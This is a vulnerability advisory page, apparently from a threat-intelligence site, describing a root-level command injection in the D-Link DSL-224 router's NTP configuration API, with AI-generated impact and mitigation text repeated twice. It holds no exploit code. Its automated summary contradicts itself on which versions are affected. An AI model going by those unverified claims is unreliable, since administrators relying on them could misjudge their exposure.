CVE-2022-36786: Post-auth RCE in D-Link DSL-224
DLINK - DSL-224 Post-auth RCE. DLINK router version 3.0.8 has an interface where you can configure NTP servers (Network Time Protocol) via jsonrpc API. It is possible to inject a command through this interface that will run with ROOT permissions on the router.
AI Analysis
Technical Summary
CVE-2022-36786 is a critical post-authentication remote code execution (RCE) vulnerability affecting all versions of the D-Link DSL-224 router, specifically version 3.0.8 and potentially others. The vulnerability arises from improper input validation in the router's JSON-RPC API interface used to configure Network Time Protocol (NTP) servers. An authenticated attacker with at least low privileges can inject arbitrary commands through this interface, which are then executed with root-level permissions on the device. This is classified under CWE-77 (Improper Neutralization of Special Elements used in a Command), indicating command injection. The vulnerability has a CVSS v3.1 base score of 9.9, reflecting its critical severity due to network attack vector (remote over network), low attack complexity, required privileges (low), no user interaction, and complete impact on confidentiality, integrity, and availability. Exploiting this flaw allows an attacker to fully compromise the router, potentially gaining persistent control, intercepting or manipulating network traffic, deploying malware, or pivoting into internal networks. Although no public exploits have been reported in the wild yet, the high severity and ease of exploitation make this a significant threat to affected environments. The lack of available patches or firmware updates at the time of reporting increases the urgency for mitigation. The vulnerability’s root cause is the unsafe handling of user-supplied input in a privileged API endpoint, which should have been properly sanitized or restricted to prevent command injection.
Potential Impact
For European organizations, the impact of CVE-2022-36786 can be substantial, especially for small and medium enterprises (SMEs) and home office users relying on D-Link DSL-224 routers for internet connectivity. Successful exploitation can lead to full compromise of the router, enabling attackers to intercept sensitive communications, redirect traffic to malicious sites, or establish persistent backdoors. This can result in data breaches, intellectual property theft, disruption of business operations, and potential lateral movement into corporate networks. Critical infrastructure or organizations with remote sites using these routers may face operational outages or espionage risks. Given the router’s role as a network gateway, the integrity and availability of connected systems are at risk. The vulnerability’s post-authentication requirement means attackers need some level of access, which could be obtained via credential theft or phishing, making insider threats or compromised credentials a relevant concern. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, as proof-of-concept code could emerge rapidly given the vulnerability’s severity.
Mitigation Recommendations
1. Immediately audit and restrict access to the router’s management interfaces, ensuring that only trusted administrators can authenticate. 2. Change default and weak passwords on all DSL-224 devices to strong, unique credentials to reduce the risk of unauthorized access. 3. Disable remote management features if not strictly necessary, or restrict remote access via IP whitelisting and VPNs. 4. Monitor network traffic for unusual activity indicative of command injection or unauthorized configuration changes. 5. Segment networks to isolate DSL-224 routers from critical internal systems, limiting potential lateral movement. 6. Regularly check for firmware updates or security advisories from D-Link and apply patches as soon as they become available. 7. Implement multi-factor authentication (MFA) on management interfaces if supported to reduce the risk of credential compromise. 8. Conduct periodic security assessments and penetration tests focusing on router and network device configurations. 9. Educate users and administrators on phishing and credential security to prevent initial access. 10. Consider replacing DSL-224 routers with more secure alternatives if patching is not feasible or timely.
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Austria
CVE-2022-36786: Post-auth RCE in D-Link DSL-224
Description
DLINK - DSL-224 Post-auth RCE. DLINK router version 3.0.8 has an interface where you can configure NTP servers (Network Time Protocol) via jsonrpc API. It is possible to inject a command through this interface that will run with ROOT permissions on the router.
AI-Powered Analysis
Technical Analysis
CVE-2022-36786 is a critical post-authentication remote code execution (RCE) vulnerability affecting all versions of the D-Link DSL-224 router, specifically version 3.0.8 and potentially others. The vulnerability arises from improper input validation in the router's JSON-RPC API interface used to configure Network Time Protocol (NTP) servers. An authenticated attacker with at least low privileges can inject arbitrary commands through this interface, which are then executed with root-level permissions on the device. This is classified under CWE-77 (Improper Neutralization of Special Elements used in a Command), indicating command injection. The vulnerability has a CVSS v3.1 base score of 9.9, reflecting its critical severity due to network attack vector (remote over network), low attack complexity, required privileges (low), no user interaction, and complete impact on confidentiality, integrity, and availability. Exploiting this flaw allows an attacker to fully compromise the router, potentially gaining persistent control, intercepting or manipulating network traffic, deploying malware, or pivoting into internal networks. Although no public exploits have been reported in the wild yet, the high severity and ease of exploitation make this a significant threat to affected environments. The lack of available patches or firmware updates at the time of reporting increases the urgency for mitigation. The vulnerability’s root cause is the unsafe handling of user-supplied input in a privileged API endpoint, which should have been properly sanitized or restricted to prevent command injection.
Potential Impact
For European organizations, the impact of CVE-2022-36786 can be substantial, especially for small and medium enterprises (SMEs) and home office users relying on D-Link DSL-224 routers for internet connectivity. Successful exploitation can lead to full compromise of the router, enabling attackers to intercept sensitive communications, redirect traffic to malicious sites, or establish persistent backdoors. This can result in data breaches, intellectual property theft, disruption of business operations, and potential lateral movement into corporate networks. Critical infrastructure or organizations with remote sites using these routers may face operational outages or espionage risks. Given the router’s role as a network gateway, the integrity and availability of connected systems are at risk. The vulnerability’s post-authentication requirement means attackers need some level of access, which could be obtained via credential theft or phishing, making insider threats or compromised credentials a relevant concern. The absence of known exploits in the wild currently reduces immediate risk but does not eliminate the threat, as proof-of-concept code could emerge rapidly given the vulnerability’s severity.
Mitigation Recommendations
1. Immediately audit and restrict access to the router’s management interfaces, ensuring that only trusted administrators can authenticate. 2. Change default and weak passwords on all DSL-224 devices to strong, unique credentials to reduce the risk of unauthorized access. 3. Disable remote management features if not strictly necessary, or restrict remote access via IP whitelisting and VPNs. 4. Monitor network traffic for unusual activity indicative of command injection or unauthorized configuration changes. 5. Segment networks to isolate DSL-224 routers from critical internal systems, limiting potential lateral movement. 6. Regularly check for firmware updates or security advisories from D-Link and apply patches as soon as they become available. 7. Implement multi-factor authentication (MFA) on management interfaces if supported to reduce the risk of credential compromise. 8. Conduct periodic security assessments and penetration tests focusing on router and network device configurations. 9. Educate users and administrators on phishing and credential security to prevent initial access. 10. Consider replacing DSL-224 routers with more secure alternatives if patching is not feasible or timely.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Data Version
- 5.1
- Assigner Short Name
- INCD
- Date Reserved
- 2022-07-26T00:00:00.000Z
- Cisa Enriched
- true
- Cvss Version
- 3.1
- State
- PUBLISHED
Threat ID: 682d983cc4522896dcbee787
Added to database: 5/21/2025, 9:09:16 AM
Last enriched: 6/25/2025, 3:04:21 AM
Last updated: 7/28/2025, 5:42:56 AM
Views: 10
Related Threats
CVE-2025-8914: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') in WellChoose Organization Portal System
HighCVE-2025-8913: CWE-98 Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') in WellChoose Organization Portal System
CriticalCVE-2025-8912: CWE-36 Absolute Path Traversal in WellChoose Organization Portal System
HighCVE-2025-8911: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in WellChoose Organization Portal System
MediumCVE-2025-8910: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in WellChoose Organization Portal System
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.